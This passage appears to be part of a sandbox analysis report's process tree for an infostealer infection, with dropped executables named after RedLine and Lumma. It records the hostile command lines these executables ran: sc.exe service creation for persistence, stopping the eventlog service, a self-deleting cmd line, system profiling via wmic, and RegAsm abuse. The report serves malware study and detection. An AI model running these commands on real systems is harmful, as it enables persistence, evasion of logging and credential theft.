    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8388768831705480784,16955842813330787407,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
        5⤵
        
        PID:4264
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8388768831705480784,16955842813330787407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
        5⤵
        
        PID:7452
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
      4⤵
      PID:540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:7232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,13180546295240802920,13415023267369769632,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:3
        5⤵
        
        PID:4744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
      4⤵
      PID:5928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:5816
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
      4⤵
      PID:7860
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff72129758,0x7fff72129768,0x7fff72129778
        5⤵
        
        PID:7256
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:2
        5⤵
        
        PID:6132
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:8112
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:6952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:1
        5⤵
        
        PID:4048
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:1
        5⤵
        
        PID:3284
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4508 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:1
        5⤵
        
        PID:8612
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4656 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:1
        5⤵
        
        PID:8792
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4808 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:1
        5⤵
        
        PID:8856
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4984 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:1
        5⤵
        
        PID:9196
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5244 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:2680
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:8344
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5512 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:9440
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5548 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:9708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:2004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3704 --field-trial-handle=1916,i,13471850599253885751,2841739898407507987,131072 /prefetch:8
        5⤵
        
        PID:9608
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
      4⤵
      Executes dropped EXE
      PID:4588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff72129758,0x7fff72129768,0x7fff72129778
        5⤵
        
        PID:1884
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1992,i,18091381948572006050,17586369519282567445,131072 /prefetch:2
        5⤵
        
        PID:8632
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1992,i,18091381948572006050,17586369519282567445,131072 /prefetch:8
        5⤵
        
        PID:8800
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
      4⤵
      PID:4820
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff72129758,0x7fff72129768,0x7fff72129778
        5⤵
        
        PID:1364
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1764 --field-trial-handle=2004,i,11239677852272384100,578271537458711963,131072 /prefetch:2
        5⤵
        
        PID:8888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=2004,i,11239677852272384100,578271537458711963,131072 /prefetch:8
        5⤵
        
        PID:9000
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:5828
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
        5⤵
        
        PID:408
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.0.886284979\1575346502" -parentBuildID 20221007134813 -prefsHandle 1712 -prefMapHandle 1704 -prefsLen 20749 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {57702ee9-25f8-4fd3-8c17-620378b0e949} 408 "\\.\pipe\gecko-crash-server-pipe.408" 1804 120b989c858 gpu
        6⤵
        
        PID:4276
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.1.910759345\1459874715" -parentBuildID 20221007134813 -prefsHandle 2244 -prefMapHandle 2240 -prefsLen 21565 -prefMapSize 233496 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {078caf35-31e8-4c73-8c85-60b8890e5a6c} 408 "\\.\pipe\gecko-crash-server-pipe.408" 2260 120b8dddb58 socket
        6⤵
        
        PID:8212
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.2.824343396\302053816" -childID 1 -isForBrowser -prefsHandle 2856 -prefMapHandle 2632 -prefsLen 21603 -prefMapSize 233496 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ae194aa-9163-40a8-8373-376ed8b3f861} 408 "\\.\pipe\gecko-crash-server-pipe.408" 3104 120bd905358 tab
        6⤵
        
        PID:6284
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.3.88718546\1740949713" -childID 2 -isForBrowser -prefsHandle 2948 -prefMapHandle 2936 -prefsLen 21709 -prefMapSize 233496 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d19472f-34b3-41cd-913b-1753089a3d0e} 408 "\\.\pipe\gecko-crash-server-pipe.408" 3184 120ad22e458 tab
        6⤵
        
        PID:3944
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.4.2075763884\1388618661" -childID 3 -isForBrowser -prefsHandle 4164 -prefMapHandle 4160 -prefsLen 21709 -prefMapSize 233496 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2db30c96-b23f-4b2f-918f-21bdd77bb763} 408 "\\.\pipe\gecko-crash-server-pipe.408" 4172 120ad22ff58 tab
        6⤵
        
        PID:9272
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.5.1055552276\281296888" -childID 4 -isForBrowser -prefsHandle 4744 -prefMapHandle 3048 -prefsLen 26300 -prefMapSize 233496 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be11e4aa-43ed-4e7e-a4b6-77e20429c87c} 408 "\\.\pipe\gecko-crash-server-pipe.408" 4712 120ad25d658 tab
        6⤵
        
        PID:6992
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="408.6.319305571\1361637323" -childID 5 -isForBrowser -prefsHandle 5116 -prefMapHandle 5112 -prefsLen 26300 -prefMapSize 233496 -jsInitHandle 952 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0555835-ac82-4312-b1bf-a8e1b97a4ed6} 408 "\\.\pipe\gecko-crash-server-pipe.408" 5140 120c0a36558 tab
        6⤵
        
        PID:9740
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      4⤵
      PID:3840
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
        5⤵
        
        PID:2740
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      4⤵
      PID:5708
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
        5⤵
        
        PID:5152
- - C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\cNNetHd77lI72vWUE9xO.exe
    "C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\cNNetHd77lI72vWUE9xO.exe"
    3⤵
    PID:7892
- - C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\PbcWtvltm2UjngaCVV79.exe
    "C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\PbcWtvltm2UjngaCVV79.exe"
    3⤵
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\gHeBBZCGmahg1OxZKmrq.exe
    "C:\Users\Admin\AppData\Local\Temp\heidiqi905QnglCFk\gHeBBZCGmahg1OxZKmrq.exe"
    3⤵
    PID:8744
- C:\Users\Admin\AppData\Local\Temp\1000631001\europe.exe
  "C:\Users\Admin\AppData\Local\Temp\1000631001\europe.exe"
  2⤵
  - Executes dropped EXE
  PID:1808
- - C:\Users\Admin\AppData\Local\Temp\onefile_1808_133531737547198549\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\1000631001\europe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "gdb --version"
      4⤵
      PID:2632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:4948
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      PID:856
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        5⤵
        
        PID:2544
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6d8c46f8,0x7fff6d8c4708,0x7fff6d8c4718
        6⤵
        
        PID:5344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4892
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
      4⤵
      PID:5876
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        5⤵
        
        PID:2540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      PID:2272
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:7752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      Loads dropped DLL
      PID:976
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:7728
- C:\Users\Admin\AppData\Local\Temp\1000635001\father1.exe
  "C:\Users\Admin\AppData\Local\Temp\1000635001\father1.exe"
  2⤵
  PID:2720
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4524
- C:\Users\Admin\AppData\Local\Temp\1000637001\judi1234.exe
  "C:\Users\Admin\AppData\Local\Temp\1000637001\judi1234.exe"
  2⤵
  PID:2992
- - C:\Users\Admin\AppData\Local\Temp\onefile_2992_133531737778141164\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\1000637001\judi1234.exe"
    3⤵
    PID:4604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5600
- C:\Users\Admin\AppData\Local\Temp\1000638001\phonesteal.exe
  "C:\Users\Admin\AppData\Local\Temp\1000638001\phonesteal.exe"
  2⤵
  PID:5112
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "THYAWYFT"
    3⤵
    - Launches sc.exe
    PID:2356
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "THYAWYFT" binpath= "C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5476
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "THYAWYFT"
    3⤵
    - Launches sc.exe
    PID:5548
- C:\Users\Admin\AppData\Local\Temp\1000639001\daisy123.exe
  "C:\Users\Admin\AppData\Local\Temp\1000639001\daisy123.exe"
  2⤵
  PID:1248
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5580
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
      4⤵
      PID:6744
- C:\Users\Admin\AppData\Local\Temp\1000640001\redline1234min.exe
  "C:\Users\Admin\AppData\Local\Temp\1000640001\redline1234min.exe"
  2⤵
  PID:1100
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "FLWCUERA"
    3⤵
    - Launches sc.exe
    PID:1268
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5608
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "FLWCUERA"
    3⤵
    - Launches sc.exe
    PID:5116
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000640001\redline1234min.exe"
    3⤵
    PID:3344
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:5252
- C:\Users\Admin\AppData\Local\Temp\1000641001\goldprimedfsdf.exe
  "C:\Users\Admin\AppData\Local\Temp\1000641001\goldprimedfsdf.exe"
  2⤵
  PID:5176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5592
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5732
- C:\Users\Admin\AppData\Local\Temp\1000642001\lumma123142124.exe
  "C:\Users\Admin\AppData\Local\Temp\1000642001\lumma123142124.exe"
  2⤵
  PID:5464
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    PID:3096
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5608
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 1180
      4⤵
      Program crash
      PID:6684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 1180
      4⤵
      Program crash
      PID:6488
- C:\Users\Admin\AppData\Local\Temp\1000643001\lolololoMRK123.exe
  "C:\Users\Admin\AppData\Local\Temp\1000643001\lolololoMRK123.exe"
  2⤵
  PID:5784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5444
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1208
      4⤵
      Program crash
      PID:6248
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5196
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Executes dropped EXE
    PID:2720
- C:\Users\Admin\AppData\Local\Temp\1000644001\alexlll.exe
  "C:\Users\Admin\AppData\Local\Temp\1000644001\alexlll.exe"
  2⤵
  PID:1692
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2808
  - - C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
